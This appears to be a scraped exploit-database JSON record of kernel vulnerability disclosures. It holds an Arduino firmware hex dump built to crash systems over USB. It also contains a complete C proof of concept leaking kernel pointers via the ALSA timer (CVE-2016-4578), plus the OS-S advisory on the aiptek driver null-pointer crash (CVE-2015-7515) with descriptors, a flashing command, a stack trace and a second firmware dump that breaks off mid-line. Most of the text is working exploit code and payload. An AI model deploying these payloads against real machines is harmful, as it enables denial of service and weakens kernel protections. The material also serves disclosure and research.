\n:101340002795BA95C9F7620F731F841F951FA01DBB \n:101350000895EE0FFF1F0590F491E02D09942F9250 \n:101360003F924F925F926F927F928F929F92AF9235 \n:10137000BF92CF92DF92EF92FF920F931F93CF9382 \n:10138000DF93CDB7DEB7CA1BDB0B0FB6F894DEBF19 \n:101390000FBECDBF09942A88398848885F846E843F \n:1013A0007D848C849B84AA84B984C884DF80EE8089 \n:1013B000FD800C811B81AA81B981CE0FD11D0FB692 \n:1013C000F894DEBF0FBECDBFED010895F894FFCFB6 \n:1013D0001201000200000040AD0BEFBE000101024F \n:1013E000000122034200610064002000420041002D \n:1013F00042004500250078002500780025006E0099 \n:101400002500700018034200410044002000430002 \n:101410003000460046004500450021001201000250 \n:1014200000000040580403500001010203010902BA \n:10143000270001010000FA0705810304040C0705D9 \n:10144000010204000C0705820104000C07000700DC \n:101450000700480100500072006F006C00690066D0 \n:101460000069006300000A550000006BFD180A00C7 \n:10147000809F0AB901312B940A8101128946001319 \n:10148000000257028B0A5E0AF80A5F01F21201009D \n:1014900002010000400D055702000101020301B9DD \n:1014A0000A0100F80A5F0A810A220342006100640F \n:1014B0000020004200410042004500250078002540 \n:1014C00000780025006E00250070001803420041DE \n:1014D000004400200043003000460046004500451F \n:1014E00000210012010002010000400D055702001A \n:1014F000010102030109040000030100000003F2DE \n:101500000AEC0A0902270001010000FA01AB0A09EE \n:101510000400000301000000090200202020202018 \n:101520005F5F5F5F5F5F5F5F2020202020202020C3 \n:1015300020202020202020202020202020202020AB \n:1015400020205F5F5F5F5F205F5F20205F202020A3 \n:101550002020205F5F0A0D00202020202F205F5FC9 \n:101560005F5F2F202F5F20205F5F5F5F205F5F5FE7 \n:101570005F5F20205F5F5F5F5F20202020202F20A3 \n:101580005F5F5F2F2F202F5F285F295F5F5F5F2FD7 \n:10159000202F5F5F0A0D002020202F202F202020E9 \n:1015A0002F205F5F205C2F205F5F20602F205F5F18 \n:1015B000205C2F205F5F5F2F5F5F5F5F205C5F5F5E \n:1015C000205C2F205F5F2F202F205F5F5F2F202F59 \n:1015D0002F5F2F0A0D0020202F202F5F5F5F2F200D \n:1015E0002F202F202F202F5F2F202F202F5F2F2005 \n:1015F000285F5F2020292F5F5F5F2F205F5F2F20F4 \n:101600002F202F5F2F202F202F5F5F2F202C3C0AB1 \n:101610000D0020205C5F5F5F5F2F5F2F202F5F2F0B \n:101620005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F63 \n:101630002F20202020202F5F5F5F5F2F5C5F5F2FB8 \n:101640005F2F5C5F5F5F2F5F2F7C5F7C0A0D002048 \n:101650003C3C2043485241534820414E59204F5072 \n:1016600045524154494E472053595354454D203E0D \n:101670003E0A0D00203C3C202863292053657267F8 \n:10168000656A20536368756D696C6F20323031353F \n:101690002C204F70656E536F7572636520536563C0 \n:1016A00075726974792052616C66205370656E6E34 \n:1016B0006562657267203E3E0A0D000A3E3E20507C \n:1016C0007265737320627574746F6E20746F20730B \n:1016D0007461727420657865637574696F6E2E2EFF \n:1016E0002E0A0D005B44454255475D2045786563F1 \n:1016F000757465207061796C6F616420300A0D002B \n:10170000526563762D446174613A0A0D005B44456D \n:101710004255475D200953656E6420436F6E6669CC \n:101720006775726174696F6E446573637269707412 \n:101730006F720928696E6465783A2569292E2E2E04 \n:101740000D0A005B44454255475D200953656E64B0 \n:1017500020496E74657266616365204465736372C7 \n:101760006970746F720928696E7465726661636569 \n:101770003A2569292E2E2E0D0A005B444542554715 \n:101780005D200953656E6420456E64706F696E74E8 \n:101790002044657363726970746F720928656E64A2 \n:1017A000706F696E743A2569292E2E2E0D0A005B22 \n:1017B00044454255475D203C3C70616E6963206D35 \n:1017C0006F64653F3E3E0D0A005B44454255475DF0 \n:1017D0002009203E3E20537472696E672044657371 \n:1017E00063726970746F72207265717565737420AD \n:1017F0002D2073656E64696E67206D616C666F7213 \n:101800006D656420737472696E67212073657475E9 \n:10181000702E7756616C75654C203D3D2025690D15 \n:101820000A005B48455844554D505D0A0D0025306F \n:04183000325820000A \n:00000001FF \n \n \n-- \nOpenSource Security Ralf Spenneberg http://www.os-s.de \nAm Bahnhof 3-5 48565 Steinfurt Germany \nFon: +49(0)2552 638 755 Fax: +49(0)2552 638 757 \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136137/OSS-2016-05_aiptek.txt"}, {"lastseen": "2019-03-12T03:25:30", "description": "", "cvss3": {}, "published": "2019-03-11T00:00:00", "type": "packetstorm", "title": "Linux Kernel 4.4 (Ubuntu 16.04) snd_timer_user_ccallback() Kernel Pointer Leak", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4578"], "modified": "2019-03-11T00:00:00", "id": "PACKETSTORM:152031", "href": "https://packetstormsecurity.com/files/152031/Linux-Kernel-4.4-Ubuntu-16.04-snd_timer_user_ccallback-Kernel-Pointer-Leak.html", "sourceData": "`#include <stdio.h> \n#include <errno.h> \n#include <string.h> \n#include <unistd.h> \n#include <stdint.h> \n#include <sys/syscall.h> \n#include <asm/unistd_64.h> \n#include <sys/types.h> \n#include <sys/stat.h> \n#include <fcntl.h> \n#include <sys/mman.h> \n#include <sys/stat.h> \n#include <sys/ioctl.h> \n#include <sound/asound.h> \n \n# Exploit Title: Linux Kernel 4.4 (Ubuntu 16.04) - Leak kernel pointer in snd_timer_user_ccallback() \n \n# Google Dork: - \n \n# Date: 2019-03-11 \n \n# Exploit Author: wally0813 \n \n# Vendor Homepage: - \n \n# Software Link: - \n \n# Version: Linux Kernel 4.4 (Ubuntu 16.04) \n \n# Tested on: ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux \n \n# CVE: CVE-2016-4578 \n \n# Category: Local \n \n \n \n/* \n* [ Briefs ] \n* - If snd_timer_user_ccallback() doesn't initialize snd_timer_tread.event and snd_timer_tread.val, they are leaked by snd_timer_user_read() \n* - This is local exploit against the CVE-2016-4578. \n* \n* [ Tested version ] \n* - 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux \n* \n* [ Prerequisites ] \n* - \n* \n* [ Goal ] \n* - Leak 4 bytes kernel pointer address using snd_timer_user_ccallback() \n* \n* [ Run exploit ] \n* - $ gcc -o poc poc.c \n* - $ sudo ./poc \n* leak_value(event) : ffff8800 \n* leak_value(val) : ffffffff \n* \n* [ Contact ] \n* - soyeoni0813@gmail.com \n*/ \n \n \n \nint fd; \n \nvoid leak(){ \n \nstruct snd_timer_tread td; \nstruct snd_timer_select st; \nstruct snd_timer_params ps; \nint r; \nunsigned int leak_value_e, leak_value_v; \nint tread; \n \nmemset(&td,0,sizeof(td)); \nmemset(&st,0,sizeof(st)); \nmemset(&ps,0,sizeof(ps)); \n \n \n// set tread \ntread = 1; \nps.filter |= 1<<SNDRV_TIMER_EVENT_START; \nps.ticks = 1000 * 1000; \n \nr = ioctl(fd, SNDRV_TIMER_IOCTL_TREAD, &tread); \nif (r) { \nprintf(\"SNDRV_TIMER_IOCTL_TREAD error : %d, %s\\n\", errno, strerror(errno)); \nreturn; \n} \n \n \n// vuln trigger \nst.id.dev_class = SNDRV_TIMER_CLASS_GLOBAL; \nst.id.dev_sclass = SNDRV_TIMER_SCLASS_APPLICATION; \nr = ioctl(fd, SNDRV_TIMER_IOCTL_SELECT, &st); \nif (r) { \nprintf(\"SNDRV_TIMER_IOCTL_SELECT error : %d, %s\\n\", errno, strerror(errno)); \nreturn; \n} \n \nr = ioctl(fd, SNDRV_TIMER_IOCTL_PARAMS, &ps); \nif (r) { \nprintf(\"SNDRV_TIMER_IOCTL_PARAMS error : %d, %s\\n\", errno, strerror(errno)); \nreturn; \n} \n \nr = ioctl(fd, SNDRV_TIMER_IOCTL_START); \nif (r) { \nprintf(\"SNDRV_TIMER_IOCTL_START error : %d, %s\\n\", errno, strerror(errno)); \nreturn; \n} \n \n \n// get leak \nr = read(fd, &td, sizeof(td)); \n \nleak_value_e = *((unsigned long *)(&td.event+1)); \nprintf(\"leak_value(event) : %lx\\n\", leak_value_e); \n \nleak_value_v = *((unsigned long *)(&td.val+1)); \nprintf(\"leak_value(val) : %lx\\n\", leak_value_v); \n \n} \n \nint main(int argc, char **argv) \n{ \nfd = open(\"/dev/snd/timer\", O_RDWR); \n \nif (fd < 0) { \nprintf(\"open error : %d, %s\\n\", errno, strerror(errno)); \nreturn -1; \n} \n \nleak(); \nclose(fd); \nreturn 0; \n} \n`\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152031/linkern44sndtimer-leak.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 3.10.0 (CentOS RHEL 7.1) - aiptek Nullpointer Dereference", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 4.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-03-09T00:00:00", "type": "exploitpack", "title": "Linux Kernel 3.10.0 (CentOS RHEL 7.1) - aiptek Nullpointer Dereference", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2016-03-09T00:00:00", "id": "EXPLOITPACK:1EC12227A84F918BB0C8C659BE0F2284", "href": "", "sourceData": "OS-S Security Advisory 2016-05\nLinux aiptek Nullpointer Dereference\n\nDate: March 4th, 2016\nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg\nCVE: CVE-2015-7515\nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)\nTitle: Local RedHat Enterprise Linux DoS \u00e2?? RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (aiptek driver)\nSeverity: Critical. The Kernel panics. A reboot is required.\nEase of Exploitation: Trivial\nVulnerability type: Wrong input validation\nProducts: RHEL 7.1 including all updates\nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)\nVendor: Red Hat\nVendor contacted: November, 12th 2015\nPDF of Advisory: https://os-s.net/advisories/OSS-2016-05_aiptek.pdf\n\nAbstract:\nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes when presented a buggy USB \ndevice using the aiptek driver.\n\nDetailed product description:\nWe confirmed the bug on the following system:\nRHEL 7.1\nKernel 3.10.0-229.20.1.el7.x86_64\nFurther products or kernel versions have not been tested.\nHow reproducible: Always\nActual results: Kernel crashes.\n\nDescription:\nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor:\n\n[*] Device-Descriptor\nbLength:\t0x12\nbDescriptorType:\t0x1\nbcdUSB:\t0x200\nbDeviceClass:\t0x3\nbDeviceSubClass:\t0x0\nbDeviceProtocol:\t0x0\nbMaxPacketSize:\t0x40\nidVendor:\t0x458\nidProduct:\t0x5003\nbcdDevice:\t0x100\niManufacturer:\t0x1\niProduct:\t0x2\niSerialNumbers:\t0x3\nbNumConfigurations:\t0x1\n[*] Configuration-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x2\nwTotalLength:\t0x27\nbNumInterfaces:\t0x1\nbConfigurationValue:\t0x1\niConfiguration:\t0x0\nbmAttributes:\t0x0\nbMaxPower:\t0x31\n[*] Interface-Descriptor\nbLength:\t0x9\nbDescriptorType:\t0x4\nbInterfaceNumber:\t0x0\nbAlternateSetting:\t0x0\nbNumEndpoints:\t0x0\nbInterfaceClass:\t0x0\nbInterfaceSubClass:\t0x0\nbInterfaceProtocol:\t0x0\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x81\nbmAttribut:\t0x3\nwMaxPacketSize:\t0x404\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x1\nbmAttribut:\t0x2\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n[*] Endpoint-Descriptor:\nbLength:\t0x7\nbDescriptorType:\t0x5\nbEndpointAddress:\t0x82\nbmAttribut:\t0x1\nwMaxPacketSize:\t0x4\nbInterval:\t0xc\n\nThe aiptek driver assumes that there will be at least one endpoint-descriptor.\nIf the interface-descriptor contains a zero-value for bNumEndpoints or no \nendpoint-descriptor is provided, the driver tries to dereference a null-\npointer and the kernel crashes:\n\n****\n$ nm aiptek.ko.debug | grep aiptek_probe\n0000000000001ea0 t aiptek_probe\n$ addr2line -e aiptek.ko.debug 2303\n/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_\n64/drivers/input/tablet/aiptek.c:1830\n****\n\n**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/input/tablet/aiptek.c)\n\n1822 endpoint = &intf->altsetting[0].endpoint[0].desc; /* Nullpointer */\n1823\n1824 /* Go set up our URB, which is called when the tablet receives\n1825 * input.\n1826 */\n1827 usb_fill_int_urb(aiptek->urb,\n1828 aiptek->usbdev,\n1829 usb_rcvintpipe(aiptek->usbdev,\n1830 endpoint->bEndpointAddress), /* Nullpointer-\nDereference */\n1831 aiptek->data, 8, aiptek_irq, aiptek,\n1832 endpoint->bInterval);\n****\n\nProof of Concept:\nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device.\n\navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex\n\nThe firmware has been attached to this bug report.\nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3!\n\nSeverity and Ease of Exploitation:\nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required.\n\nVendor Communication:\nWe contacted Red Hat on the November, 12th 2015.\nA patch was provided on the November, 25th 2015.\n\nReferences:\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1285326\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283350\n\nKernel Stacktrace:\n\n[ 622.149957] usb 1-1: new full-speed USB device number 2 using xhci_hcd\n[ 622.354485] usb 1-1: config 1 interface 0 altsetting 0 has 3 endpoint \ndescriptors, different from the interface descriptor's value: 0\n[ 622.386630] usb 1-1: New USB device found, idVendor=0458, idProduct=5003\n[ 622.392414] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3\n[ 622.399416] usb 1-1: Product: \u00c4?\n[ 622.404640] usb 1-1: Manufacturer: \u00c4?\n[ 622.410079] usb 1-1: SerialNumber: %\n[ 622.444650] BUG: unable to handle kernel NULL pointer dereference at \n0000000000000002\n[ 622.445019] IP: [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]\n[ 622.445019] PGD 0 \n[ 622.445019] Oops: 0000 [#1] SMP \n[ 622.445019] Modules linked in: aiptek(+) ip6t_rpfilter ip6t_REJECT \nipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc \nebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 \nnf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter \nip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat \nnf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter \nip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper \ndrm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c \nsd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix \nlibata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod\n[ 622.445019] CPU: 0 PID: 2242 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1\n[ 622.445019] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014\n[ 622.445019] task: ffff88000e65a220 ti: ffff88000f4cc000 task.ti: ffff88000f4cc000\n[ 622.445019] RIP: 0010:[<ffffffffa0395303>] [<ffffffffa0395303>] \naiptek_probe+0x463/0x658 [aiptek]\n[ 622.445019] RSP: 0018:ffff88000f4cfb80 EFLAGS: 00010286\n[ 622.445019] RAX: 0000000000000000 RBX: ffff88000bd67800 RCX: ffff88000bcd0800\n[ 622.445019] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffff88000ca29000\n[ 622.445019] RBP: ffff88000f4cfbe0 R08: 0000000000000000 R09: 0000000000000000\n[ 622.445019] R10: ffff88000e401400 R11: ffffffff810020d8 R12: ffff88000c525800\n[ 622.445019] R13: ffff88000c525830 R14: ffff88000bcd1800 R15: ffff88000bd67834\n[ 622.445019] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000\n[ 622.445019] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b\n[ 622.445019] CR2: 0000000000000002 CR3: 000000000d67f000 CR4: \n00000000000006f0\n[ 622.445019] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000\n[ 622.445019] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400\n[ 622.445019] Stack:\n[ 622.445019] ffff88000bcd0800 0000000000000001 0000019000000246 \n0000019000000032\n[ 622.445019] 0000006400000019 0000012c000000c8 000000000cc3e092 \nffff88000bcd0890\n[ 622.445019] ffff88000bcd0800 ffffffffa0397068 ffff88000c525830 ffffffffa03965c0\n[ 622.445019] Call Trace:\n[ 622.445019] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0\n[ 622.445019] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390\n[ 622.445019] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0\n[ 622.445019] [<ffffffff813d3420>] ? __device_attach+0x40/0x40\n[ 622.445019] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0\n[ 622.445019] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20\n[ 622.445019] [<ffffffff813d2680>] bus_add_driver+0x200/0x2d0\n[ 622.445019] [<ffffffff813d3b34>] driver_register+0x64/0xf0\n[ 622.445019] [<ffffffff8141c1c2>] usb_register_driver+0x82/0x160\n[ 622.445019] [<ffffffffa039a000>] ? 0xffffffffa0399fff\n[ 622.445019] [<ffffffffa039a01e>] aiptek_driver_init+0x1e/0x1000 [aiptek]\n[ 622.445019] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230\n[ 622.445019] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40\n[ 622.445019] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0\n[ 622.445019] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150\n[ 622.445019] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0\n[ 622.445019] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b\n[ 622.445019] Code: 45 31 c9 45 31 c0 b9 ff 03 00 00 be 08 00 00 00 4c 89 f7 \ne8 90 39 0d e1 49 8b 04 24 48 8b 4b 08 48 8b bb 10 01 00 00 48 8b 40 18 <0f> \nb6 50 02 0f b6 70 06 8b 01 c1 e2 0f c1 e0 08 81 ca 80 00 00 \n[ 622.445019] RIP [<ffffffffa0395303>] aiptek_probe+0x463/0x658 [aiptek]\n[ 622.445019] RSP <ffff88000f4cfb80>\n[ 622.445019] CR2: 0000000000000002\n[ 622.860772] ---[ end trace b239663354a1c556 ]---\n[ 622.864813] Kernel panic - not syncing: Fatal exception\n[ 622.865768] drm_kms_helper: panic occurred, switching back to text console\n\nArduino Leonardo Firmware:\n\n:100000000C94A8000C94C5000C94C5000C94C50079\n:100010000C94C5000C94C5000C94C5000C94C5004C\n:100020000C94C5000C94C5000C94C2050C942D04CE\n:100030000C94C5000C94C5000C94C5000C94C5002C\n:100040000C94C5000C94C5000C94C5000C94C5001C\n:100050000C94C5000C94C5000C94C5000C940C02C3\n:100060000C94C5000C94C5000C94C5000C94C500FC\n:100070000C94C5000C94C5000C94C5000C94C500EC\n:100080000C94C5000C94C5000C94C5000C94C500DC\n:100090000C94C5000C94C5000C94C5000C94C500CC\n:1000A0000C94C5000C94C5000C94C50009030C0306\n:1000B000FF0203032D032D032D0310031403180364\n:1000C0001E0322032D0328030000000200080E0077\n:1000D00000030401000B000000000000000000000D\n:1000E00000000000000004080201104080401020C1\n:1000F00040804080080204018040201002011080EE\n:100100001020404004040404040304050202020217\n:1001100004030202020206060606060604040202A0\n:100120000204000000002300260029002C002F00FC\n:1001300000000000250028002B002E0031000000E8\n:100140000000240027002A002D00300000C180811B\n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077\n:10016000B1E0E0EDF3E102C005900D92A436B107D5\n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C\n:10018000E1F70E94C8000C9402070C940000089547\n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421\n:1001A000DEBF0FBECDBF0E949F020E94C70060E06D\n:1001B00083E00E942E0361E087E00E942E0361E04D\n:1001C00088E00E942E030E9457067E012AE9E20E73\n:1001D000F11C84E093E0D70111969C938E9389E003\n:1001E00094E013969C938E93129782E2E2E1F1E001\n:1001F0009E012F5F3F4F6901D90101900D928A95B1\n:10020000E1F788E1E4E3F1E0DE01939601900D92DD\n:100210008A95E1F782E1ECE4F1E0DE01DB96019002\n:100220000D928A95E1F789E0EEE5F1E0DE01A05953\n:10023000BF4F01900D928A95E1F72A593F4F99E0FF\n:10024000992ED901E92D1D92EA95E9F78E010957FA\n:100250001F4F87E0E7E6F1E0D80101900D928A9503\n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189\n:1002700001900D928A95E1F7AE0147585F4F87E0F4\n:10028000E5E7F1E0DA0101900D928A95E1F75E0170\n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D\n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172\n:1002B0001D92EA95E9F7E3E0DC011996EC93F90168\n:1002C0009082E4E0D9011196EC93F901DC01292D2B\n:1002D00001900D922A95E1F7FE01EC56FF4FDC01EB\n:1002E0001B96FC93EE931A971D96BC92AE921C97A8\n:1002F0001183008373836283558344830C521109F5\n:100300002CE0F80111922A95E9F721E0D80119961D\n:100310002C931997FE01E059FF4F01900D929A948A\n:10032000E1F7F8019387828761E088E00E94670324\n:100330008BE492E00E94630688E892E00E946306E4\n:1003400087EC92E00E94630686E093E00E946306D9\n:1003500082E493E00E9463068FE793E00E946306C5\n:1003600084EA93E00E9463068BEE93E00E946306AA\n:1003700083E00E949D03892B09F047C05E01F3E2F0\n:10038000AF0EB11C8824839482E1982E84E194E01E\n:100390000E946306BF92AF92DF92CF92FF92EF92DC\n:1003A0001F928F921F930F932DB73EB722513109A1\n:1003B0000FB6F8943EBF0FBE2DBFADB7BEB71196B6\n:1003C000FE01FB96892D01900D928A95E1F78DE64D\n:1003D00095E00E94010668E873E180E090E00E94E9\n:1003E00079028DE695E00E944C0660E087E00E946D\n:1003F000670368E873E180E090E00E9479020FB63D\n:10040000F894DEBF0FBECDBFC1CF6AE070E080E0E0\n:1004100090E00E947902ACCF1F920F920FB60F921C\n:1004200011242F933F938F939F93AF93BF9380910A\n:10043000650590916605A0916705B09168053091BA\n:10044000640523E0230F2D3720F40196A11DB11D73\n:1004500005C026E8230F0296A11DB11D2093640557\n:100460008093650590936605A0936705B093680532\n:100470008091690590916A05A0916B05B0916C051A\n:100480000196A11DB11D8093690590936A05A09303\n:100490006B05B0936C05BF91AF919F918F913F9188\n:1004A0002F910F900FBE0F901F9018953FB7F894A3\n:1004B0008091690590916A05A0916B05B0916C05DA\n:1004C00026B5A89B05C02F3F19F00196A11DB11DAF\n:1004D0003FBF6627782F892F9A2F620F711D811DCC\n:1004E000911D42E0660F771F881F991F4A95D1F72B\n:1004F0000895CF92DF92EF92FF92CF93DF936B013B\n:100500007C010E945602EB01C114D104E104F10404\n:1005100079F00E9456026C1B7D0B683E7340A0F37D\n:1005200081E0C81AD108E108F108C851DC4FECCFCE\n:10053000DF91CF91FF90EF90DF90CF900895789466\n:1005400084B5826084BD84B5816084BD85B58260D8\n:1005500085BD85B5816085BDEEE6F0E08081816076\n:100560008083E1E8F0E01082808182608083808176\n:1005700081608083E0E8F0E0808181608083E1E950\n:10058000F0E0808182608083808181608083E0E907\n:10059000F0E0808181608083E1ECF0E08081846024\n:1005A0008083808182608083808181608083E3ECAE\n:1005B000F0E0808181608083E0ECF0E08081826007\n:1005C0008083E2ECF0E0808181608083EAE7F0E004\n:1005D000808184608083808182608083808181606B\n:1005E0008083808180688083089590E0FC0131974A\n:1005F000EE30F10590F5EA5AFF4F0C94A90980916D\n:1006000080008F7703C0809180008F7D8093800071\n:10061000089584B58F7702C084B58F7D84BD089519\n:10062000809190008F7707C0809190008F7D03C0EC\n:1006300080919000877F8093900008958091C00002\n:100640008F7703C08091C0008F7D8093C000089594\n:100650008091C200877F8093C2000895CF93DF937B\n:1006600090E0FC01EA51FF4F2491FC01EC5FFE4F4A\n:100670008491882349F190E0880F991FFC01E25C86\n:10068000FE4FA591B491805D9E4FFC01C591D49120\n:100690009FB7611108C0F8948C91209582238C93A8\n:1006A000888182230AC0623051F4F8948C91322FF1\n:1006B000309583238C938881822B888304C0F8949F\n:1006C0008C91822B8C939FBFDF91CF9108950F93D4\n:1006D0001F93CF93DF931F92CDB7DEB7282F30E063\n:1006E000F901E853FF4F8491F901EA51FF4F14914A\n:1006F000F901EC5FFE4F04910023C9F0882321F03B\n:1007000069830E94F5026981E02FF0E0EE0FFF1F80\n:10071000E05DFE4FA591B4919FB7F8948C91611163\n:1007200003C01095812301C0812B8C939FBF0F9034\n:10073000DF91CF911F910F910895CF93DF93282FD1\n:1007400030E0F901E853FF4F8491F901EA51FF4F7E\n:10075000D491F901EC5FFE4FC491CC2391F081114B\n:100760000E94F502EC2FF0E0EE0FFF1FEE5DFE4F52\n:10077000A591B4912C912D2381E090E021F480E0AB\n:1007800002C080E090E0DF91CF910895615030F099\n:100790002091F100FC0120830196F8CF289884E68F\n:1007A00080937D0508951092E900109271051092D2\n:1007B000700590936F0580936E050895FF920F93D7\n:1007C0001F93CF93DF93F82E8B01EA01BA01C80182\n:1007D0000E94A406F80120E030E08EEF2C173D07C0\n:1007E00091F1F7FE02C0A49101C0A0816091700553\n:1007F0007091710540916E0550916F0564177507F2\n:10080000ACF49091E8009570E1F39091E80092FDCE\n:100810001CC0A093F100A0917005B09171051196D4\n:10082000AF73BB27AB2B11F48093E800A091700548\n:10083000B09171051196B0937105A09370052F5F6B\n:100840003F4F3196CBCFC90102C08FEF9FEFDF91B1\n:10085000CF911F910F91FF9008951F920F920FB6A5\n:100860000F9211246F927F928F929F92AF92BF92BC\n:10087000CF92DF92EF92FF920F931F932F933F93AC\n:100880004F935F936F937F938F939F93AF93BF9398\n:10089000EF93FF93CF93DF93CDB7DEB76297DEBFC1\n:1008A000CDBF1092E9008091E80083FF46C168E067\n:1008B000CE010A960E94C60382EF8093E8009A85D3\n:1008C00097FF05C08091E80080FFFCCF03C08EEF4A\n:1008D0008093E800892F807609F023C18B858111F0\n:1008E00005C01092F1001092F10020C1282F2D7F39\n:1008F000213009F41BC1853049F48091E80080FF64\n:10090000FCCF8C8580688093E30010C1863009F0AD\n:10091000E1C02D8508891989223009F0B3C0EC8423\n:100920008E2D90E020917305309174058217930706\n:100930000CF09FC00E94D3031F92EF928DE394E0CE\n:100940009F938F930E9481068CE0E89E7001112492\n:10095000E0917505F0917605EE0DFF1D89E0DE0151\n:10096000119601900D928A95E1F7C8010E94D30378\n:1009700049E050E0BE016F5F7F4F80E00E94DE03E0\n:100980000F900F900F900F90C12CD12C612C712CD7\n:1009900033E7A32E34E0B32E4AEA842E44E0942EAB\n:1009A000E0917505F0917605EE0DFF1D818590E0D3\n:1009B000681679060CF0BAC07F926F92BF92AF9220\n:1009C0000E948106E0917505F0917605EE0DFF1D00\n:1009D000628573856C0D7D1D49E050E080E00E94CA\n:1009E000DE030F900F900F900F9000E010E0E09169\n:1009F0007505F0917605EE0DFF1D0284F385E02D5F\n:100A0000EC0DFD1D818590E0081719075CF51F931B\n:100A10000F939F928F920E948106E0917505F0914D\n:100A20007605EE0DFF1D0284F385E02DEC0DFD1D16\n:100A3000C801880F991FA485B585A80FB91F4D91CE\n:100A40005C910284F385E02DE80FF91F60817181CC\n:100A500080E00E94DE030F5F1F4F0F900F900F90FA\n:100A60000F90C5CF8FEF681A780A8EE0C80ED11CA0\n:100A700097CF8FED94E09F938F930E9481060F9004\n:100A80000F9058C0C8012A8B0E94D3032A892130B5\n:100A9000C1F0233009F04EC08C851F928F9389EFEF\n:1